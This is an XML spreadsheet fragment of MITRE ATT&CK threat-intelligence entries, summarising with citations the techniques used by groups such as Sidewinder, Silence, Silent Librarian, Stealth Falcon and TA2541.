    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used &lt;code&gt;mshta.exe&lt;/code&gt; to execute malicious payloads.(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)</t>
  </si>
  <si>
    <t>relationship--0ecbbfa3-6b81-4cf7-9033-373ebbc2832f</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used base64 encoding and ECDH-P256 encryption for payloads.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>relationship--32e947a4-cbd3-45a8-ae74-7e51edf84d81</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used PowerShell to drop and execute malware loaders.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--a55c163c-3eb8-47a2-8ad1-3a667b4ac129</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to identify running processes on the victim's machine.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--1e9f6719-24c5-4c8b-a832-506f46bbadb6</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has added paths to executables in the Registry to establish persistence.(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>relationship--5d43c968-d9d2-4687-949e-23888376f10c</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used the Windows service &lt;code&gt;winmgmts:\\.\root\SecurityCenter2&lt;/code&gt; to check installed antivirus products.(Citation: Rewterz Sidewinder APT April 2020)</t>
  </si>
  <si>
    <t>relationship--0cf2ae01-9d19-46d7-949e-e6d7a5639a95</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to enumerate software installed on an infected host.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)</t>
  </si>
  <si>
    <t>relationship--ab058a49-a8fc-403d-ae97-9137625c82d7</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious attachments often crafted for specific targets.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--cbfb1a32-4582-4ecb-8a0e-4c76caaa5063</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious attachments that lead victims to credential harvesting websites.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>relationship--a28e6ec8-0519-40e7-b252-90205dfbe5d9</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious links often crafted for specific targets.(Citation: ATT Sidewinder January 2021)(Citation: Cyble Sidewinder September 2020)</t>
  </si>
  <si>
    <t>relationship--118e5be5-a143-4e2f-b80f-20b580f14210</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious links to credential harvesting websites.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--107dc621-6f5d-4b59-9873-54355e55312d</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</si>
  <si>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</si>
  <si>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relationship--b30cc0be-74f0-42a6-85ef-594d6d184bae</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used malware to collect information on network interfaces, including the MAC address.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--9eb64003-16d8-4b2d-b5e5-206130e5dd17</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to identify the user of a compromised host.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--fc43ba07-ffa2-4617-95ac-7ff6462eccd0</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to obtain the current system time.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--10cf6efc-6415-4a80-834a-565057e76474</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used VBScript to drop and execute malware loaders.(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--afbd6b8a-8636-401c-b04d-e0aa584fa6fa</t>
  </si>
  <si>
    <t>[Sidewinder](https://attack.mitre.org/groups/G0121) has used HTTP in C2 communications.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)</t>
  </si>
  <si>
    <t>relationship--60be159a-b083-48c2-bd38-4abb873d1f30</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used a valid certificate to sign their primary loader Silence.Downloader (aka TrueBot).(Citation: Group IB Silence Aug 2019)</t>
  </si>
  <si>
    <t>relationship--908f1fa6-c797-47c3-bcb1-3438a9105095</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used environment variable string substitution for obfuscation.(Citation: Cyber Forensicator Silence Jan 2019)</t>
  </si>
  <si>
    <t>relationship--7b2113c8-9b48-4f93-9090-3946a980c183</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has weaponized CHM files in their phishing campaigns.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Aug 2019)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--68602080-9968-4a36-9a5e-130343e61566</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\Socks5.(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t>relationship--89077d0b-aaa2-48b9-90d7-e253a550bfad</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has deleted artifacts, including scheduled tasks, communicates files from the C2 and other logs.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t>relationship--ccd99593-7ff0-4706-aa94-73cc8d237fe8</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has downloaded additional modules and malware to victim’s machines.(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t>relationship--948146db-f966-4e0c-bbb2-289e2eae6718</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used JS scripts.(Citation: Cyber Forensicator Silence Jan 2019)</t>
  </si>
  <si>
    <t>relationship--60989b47-4725-4077-8aed-fb5f990fda22</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used the Farse6.1 utility (based on [Mimikatz](https://attack.mitre.org/software/S0002)) to extract credentials from lsass.exe.(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--a9c366b6-270d-4884-86dd-7c048460741b</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) attempts to get users to launch malicious attachments delivered via spearphishing emails.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--efe23026-7cba-46df-873b-1c8244a92d36</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has named its backdoor "WINWORD.exe".(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--e3038b75-63f6-44c2-9645-673bbf0ffa3b</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) can create, delete, or modify a specified Registry key or value.(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--396a5415-67aa-4ec6-ae27-6be641d69e15</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has leveraged the Windows API, including using CreateProcess() or ShellExecute(), to perform a variety of tasks.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--fdedfad5-5cb7-436a-8522-6df3f6de42b1</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has used port 444 when sending data about the system from the client to the server.(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t>relationship--01c982c2-f610-443f-ae60-1b4a1f508f81</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used PowerShell to download and execute payloads.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--afafd676-1b44-44ae-ad9a-930c0df348bc</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has injected a DLL library containing a Trojan into the fwmain32.exe process.(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--28a76700-4834-4a1b-bb56-2005bc044e29</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</si>
  <si>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</si>
  <si>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relationship--2d49852d-083e-4379-90e3-dcb0748be624</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has used RDP for lateral movement.(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t>relationship--5cc793b0-cc45-439e-a994-c8884ca55fe7</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091) has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.(Citation: Group IB Silence Sept 2018)	</t>
  </si>
  <si>
    <t>relationship--a6dc02a8-2ce3-45db-a7e5-e475d6acec3c</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used scheduled tasks to stage its operation.(Citation: Cyber Forensicator Silence Jan 2019)</t>
  </si>
  <si>
    <t>relationship--1d7e1954-b020-4578-9a57-b1596a7a25ff</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) can capture victim screen activity.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--778765e1-7eb6-46b1-a370-6dfe09081ee3</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used [Winexe](https://attack.mitre.org/software/S0191) to install a service on the remote system.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--85be49ac-785e-48af-8d0e-4b74818428fc</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used RAdmin, a remote software tool used to remotely control workstations and ATMs.(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--6fc128ed-90f3-4933-8ad7-4fd4a04cb39f</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has sent emails with malicious DOCX, CHM, LNK and ZIP attachments. (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--da6a811d-2a77-4f6f-a19e-2aff8662f12f</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has obtained and modified versions of publicly-available tools like [Empire](https://attack.mitre.org/software/S0363) and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Group IB Silence Aug 2019) (Citation: SecureList Silence Nov 2017)</t>
  </si>
  <si>
    <t>relationship--c3a35bf1-acfc-4e70-8be8-db843110a142</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used compromised credentials to log on to other systems and escalate privileges.(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--9569bfcd-38f8-4cb7-8470-a473ea9e4328</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has been observed making videos of victims to observe bank employees day to day activities.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--5e60c70a-7b2f-45b8-b7d4-80e214acfb2d</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used VBS scripts.(Citation: Cyber Forensicator Silence Jan 2019)</t>
  </si>
  <si>
    <t>relationship--378914cd-36cf-409f-8c99-25e144218546</t>
  </si>
  <si>
    <t>[Silence](https://attack.mitre.org/groups/G0091) has used Windows command-line to run commands.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--f1eda5c7-6843-406d-89b8-c61759c02450</t>
  </si>
  <si>
    <t>G0122</t>
  </si>
  <si>
    <t>Silent Librarian</t>
  </si>
  <si>
    <t>intrusion-set--90784c1e-4aba-40eb-9adf-7556235e6384</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has obtained free Let's Encrypt SSL certificates for use on their phishing pages.(Citation: Phish Labs Silent Librarian)(Citation: Secureworks COBALT DICKENS September 2019)</t>
  </si>
  <si>
    <t>relationship--1a2119a2-6a39-4062-b90c-bffd15b259ec</t>
  </si>
  <si>
    <t>04 February 2021</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</si>
  <si>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</si>
  <si>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relationship--b85fdb75-ec29-4bc9-921d-b11ebd8528dc</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has established e-mail accounts to receive e-mails forwarded from compromised accounts.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>relationship--83219112-6e5b-43ea-a7a7-78213f28397f</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has collected e-mail addresses from targeted organizations from open Internet searches.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>relationship--87661f05-f448-49be-afa8-d8198a1c0092</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has exfiltrated entire mailboxes from compromised accounts.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>relationship--406fbbc1-408a-4f59-8f0c-0f670eb60879</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has set up auto forwarding rules on compromised e-mail accounts.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>relationship--67f029d5-c44b-446b-9efe-0e0e0d85192a</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has collected lists of names for individuals from targeted organizations.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>relationship--53608455-3b90-45b1-9006-da343efa52d4</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</si>
  <si>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</si>
  <si>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relationship--9038cd4b-182b-469f-ac45-83dedf5110c9</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has used collected lists of names and e-mail accounts to use in password spraying attacks against private sector targets.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>relationship--93edbfc7-c1be-4c2c-aa2c-9b15f53f6528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</si>
  <si>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</si>
  <si>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relationship--33201f98-6367-4f36-a581-98fd4d1203fa</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</si>
  <si>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</si>
  <si>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relationship--44866cfd-7d8f-45f6-906b-5b4992aa69e0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</si>
  <si>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</si>
  <si>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relationship--d970ba14-4c96-4f98-a1e1-4417f52b76f3</t>
  </si>
  <si>
    <t>[Silent Librarian](https://attack.mitre.org/groups/G0122) has used compromised credentials to obtain unauthorized access to online accounts.(Citation: DOJ Iran Indictments March 2018)</t>
  </si>
  <si>
    <t>relationship--e85549b5-77c8-426a-b7ea-fec30b05973f</t>
  </si>
  <si>
    <t xml:space="preserve">[SilverTerrier](https://attack.mitre.org/groups/G0083) uses FTP for C2 communications.(Citation: Unit42 SilverTerrier 2018)	</t>
  </si>
  <si>
    <t>relationship--cff191ef-39ba-4126-b039-12a7fe327665</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</si>
  <si>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</si>
  <si>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relationship--e5f93ccd-67e5-4bb5-805e-e39b41cfabf3</t>
  </si>
  <si>
    <t>[SilverTerrier](https://attack.mitre.org/groups/G0083) uses SMTP for C2 communications.(Citation: Unit42 SilverTerrier 2018)</t>
  </si>
  <si>
    <t>relationship--5e7e3226-1583-48de-9376-946fa88b6d15</t>
  </si>
  <si>
    <t xml:space="preserve">[SilverTerrier](https://attack.mitre.org/groups/G0083) uses HTTP for C2 communications.(Citation: Unit42 SilverTerrier 2018)	</t>
  </si>
  <si>
    <t>relationship--87cc66d0-7cab-4584-b86e-f2d56d492271</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) extracted documents and bundled them into a RAR archive.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>relationship--953134ab-5816-43b8-b2b1-8f4c9305f57a</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) extracted Word documents from a file server on a victim network.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>relationship--5f3eb1ae-782e-4e49-8e1e-650f3e5a1139</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</si>
  <si>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</si>
  <si>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relationship--0efa0a7a-545d-49e2-b0c4-0e251226404a</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) has used keylogging tools.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>relationship--ae1600d0-8271-4709-a1a6-6fb62494fa23</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory &lt;code&gt;CSIDL_APPDATA\microsoft\security&lt;/code&gt;.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>relationship--d6d66a6f-dbc8-4d7b-b3fc-634f2765429a</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) listed remote shared drives that were accessible from a victim.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>relationship--cc495391-9abd-4df1-8ad7-ec8d84feaeb9</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) has used credential dumping tools.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>relationship--d93265a6-1f92-472b-9e47-48b7863d8171</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) obtained OS version and hardware configuration from a victim.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>relationship--e20b57e5-c010-4b9e-a04e-660daa8b5c87</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) has used command line during its intrusions.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>relationship--9f618c0f-79b8-4990-a02b-6e3187b14033</t>
  </si>
  <si>
    <t>G0038</t>
  </si>
  <si>
    <t>Stealth Falcon</t>
  </si>
  <si>
    <t>intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware uses WMI to script data collection and command execution on the victim.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--0d63f3cf-bace-4210-9b76-199c5cdb8764</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--4d3e4232-1330-45a9-9e90-9914eed276a5</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers passwords from multiple sources, including Internet Explorer, Firefox, and Chrome.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--410e0c58-d96c-40ae-bf00-2d4b414daf50</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers data from the local victim system.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--cdf73653-b2d7-422f-b433-b6a428ff12d4</t>
  </si>
  <si>
    <t>After data is collected by [Stealth Falcon](https://attack.mitre.org/groups/G0038) malware, it is exfiltrated over the existing C2 channel.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--e1592867-e02f-4c1f-a9f2-1c60e25a1301</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--e2e33068-b08e-45fd-89e0-0cf79868f902</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers a list of running processes.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--4de2ac9b-4e51-4d73-8fe3-d7d1659778b8</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware attempts to determine the installed version of .NET by querying the Registry.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--746b0def-62c8-438d-b5ec-aa6b7dbfb860</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware creates a scheduled task entitled “IE Web Cache” to execute a malicious file hourly.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--e362d1ad-5d36-4f6d-b2b0-63af2f5f08ff</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware encrypts C2 traffic using RC4 with a hard-coded key.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--73da57b5-e64f-44ee-85f7-d294c21fb534</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--efbe5efa-6863-4334-90e5-d7caab9806a6</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers the Address Resolution Protocol (ARP) table from the victim.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--510c2f8c-4570-4c19-8c36-7004f8bbf561</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers the registered user and primary owner name via WMI.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--8ebab956-4440-4fd7-96ff-8da29e0f0b46</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware communicates with its C2 server via HTTPS.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--782da600-bc3b-4dae-89d1-4a79522bed02</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers passwords from the Windows Credential Vault.(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--04a6eba6-71d7-47d1-91f1-c728ada6b7b5</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers system information via Windows Management Instrumentation (WMI).(Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>relationship--94b4648a-4108-468c-be51-cca365fd97ac</t>
  </si>
  <si>
    <t>[Strider](https://attack.mitre.org/groups/G0041) has used a hidden file system that is stored as a file on disk.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>relationship--d24a47e5-e735-4cad-9c44-09d3a39d514c</t>
  </si>
  <si>
    <t>[Strider](https://attack.mitre.org/groups/G0041) has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.(Citation: Kaspersky ProjectSauron Blog)</t>
  </si>
  <si>
    <t>relationship--6476b9fe-dc7f-4578-a39d-beebc8390af2</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</si>
  <si>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</si>
  <si>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relationship--8cbb1567-70c5-4daf-b163-cbc6cc40a794</t>
  </si>
  <si>
    <t>[Suckfly](https://attack.mitre.org/groups/G0039) has used stolen certificates to sign its malware.(Citation: Symantec Suckfly March 2016)</t>
  </si>
  <si>
    <t>relationship--cb2d2f2d-face-430b-995d-c9bd35db5b90</t>
  </si>
  <si>
    <t>[Suckfly](https://attack.mitre.org/groups/G0039) the victim's internal network for hosts with ports 8080, 5900, and 40 open.(Citation: Symantec Suckfly May 2016)</t>
  </si>
  <si>
    <t>relationship--9b360cf4-4600-4ea8-a28c-99d91e0d1734</t>
  </si>
  <si>
    <t>[Suckfly](https://attack.mitre.org/groups/G0039) used a signed credential-dumping tool to obtain victim account credentials.(Citation: Symantec Suckfly May 2016)</t>
  </si>
  <si>
    <t>relationship--a0c55c8d-6192-4faa-a5a2-1742fb5815a0</t>
  </si>
  <si>
    <t>[Suckfly](https://attack.mitre.org/groups/G0039) used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner.(Citation: Symantec Suckfly May 2016)</t>
  </si>
  <si>
    <t>relationship--82b679af-7408-4f41-8fc0-5b0cf5993726</t>
  </si>
  <si>
    <t>Several tools used by [Suckfly](https://attack.mitre.org/groups/G0039) have been command-line driven.(Citation: Symantec Suckfly May 2016)</t>
  </si>
  <si>
    <t>relationship--13a8be40-1190-4553-b026-58c5088c322a</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has used TLS encrypted C2 communications including for campaigns using AsyncRAT.(Citation: Cisco Operation Layover September 2021)</t>
  </si>
  <si>
    <t>relationship--0b51c002-4a22-413c-9d6d-ffd7fd625736</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018)  has attempted to disable built-in security protections such as Windows AMSI. (Citation: Proofpoint TA2541 February 2022)</t>
  </si>
  <si>
    <t>relationship--0fe5da4f-874f-491d-9e50-0e3540a6d90b</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</si>
  <si>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</si>
  <si>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relationship--6294c77d-4a8d-4f6d-ba52-d3b84c109cb4</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has used dynamic DNS services for C2 infrastructure.(Citation: Proofpoint TA2541 February 2022)</t>
  </si>
  <si>
    <t>relationship--20e1f501-0932-40d2-a41b-386a8b9d463d</t>
  </si>
  <si>
    <t xml:space="preserve">
[TA2541](https://attack.mitre.org/groups/G1018) has used malicious scripts and macros with the ability to download additional payloads.(Citation: Cisco Operation Layover September 2021)
</t>
  </si>
  <si>
    <t>relationship--1fc9bf47-32e7-45e5-87f3-3e7a5efdd35d</t>
  </si>
  <si>
    <t xml:space="preserve">
[TA2541](https://attack.mitre.org/groups/G1018) has run scripts to check internet connectivity from compromised hosts. (Citation: Cisco Operation Layover September 2021)
</t>
  </si>
  <si>
    <t>relationship--86c55cd3-efb5-4bd3-9958-a5af1f1b0679</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</si>
  <si>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</si>
  <si>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relationship--b0766ea1-924a-4e1f-92db-17e5f4a3b72d</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has used malicious links to cloud and web services to gain execution on victim machines.(Citation: Proofpoint TA2541 February 2022)(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>relationship--6035f6c6-8e6c-4ac6-9467-722502e90799</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has used multiple strains of malware available for purchase on criminal forums or in open-source repositories.(Citation: Proofpoint TA2541 February 2022)</t>
  </si>
  <si>
    <t>relationship--3c2faef1-3fa6-4942-be18-460a8e6ec815</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has used file names to mimic legitimate Windows files or system functionality.(Citation: Proofpoint TA2541 February 2022)</t>
  </si>
  <si>
    <t>relationship--2463fa2a-0264-4287-a87b-3d4ada527ac5</t>
  </si>
  <si>
    <t xml:space="preserve">
[TA2541](https://attack.mitre.org/groups/G1018) has used `mshta` to execute scripts including VBS.(Citation: Cisco Operation Layover September 2021)
</t>
  </si>
  <si>
    <t>relationship--4bd79a52-d28c-4880-9f10-dda500ac40c9</t>
  </si>
  <si>
    <t xml:space="preserve">
[TA2541](https://attack.mitre.org/groups/G1018) has used compressed and char-encoded scripts in operations.(Citation: Cisco Operation Layover September 2021)
</t>
  </si>
  <si>
    <t>relationship--738fbccb-ecc9-40cb-8d51-4f558e39b01f</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has used PowerShell to download files and to inject into various Windows processes.(Citation: Proofpoint TA2541 February 2022)</t>
  </si>
  <si>
    <t>relationship--6f6803c2-ab49-4c74-b0fe-262276e85d3e</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has used process hollowing to execute CyberGate malware.(Citation: Cisco Operation Layover September 2021)</t>
  </si>
  <si>
    <t>relationship--8b289eb7-6960-45c4-bea8-bbd9ace81055</t>
  </si>
  <si>
    <t>[TA2541](https://attack.mitre.org/groups/G1018) has injected malicious code into legitimate .NET related processes including  regsvcs.exe, msbuild.exe, and installutil.exe.(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)</t>
  </si>
  <si>
    <t>relationship--6ada1a93-2fc2-4bd7-bec8-5d41b406e181</t>
  </si>
  <si>
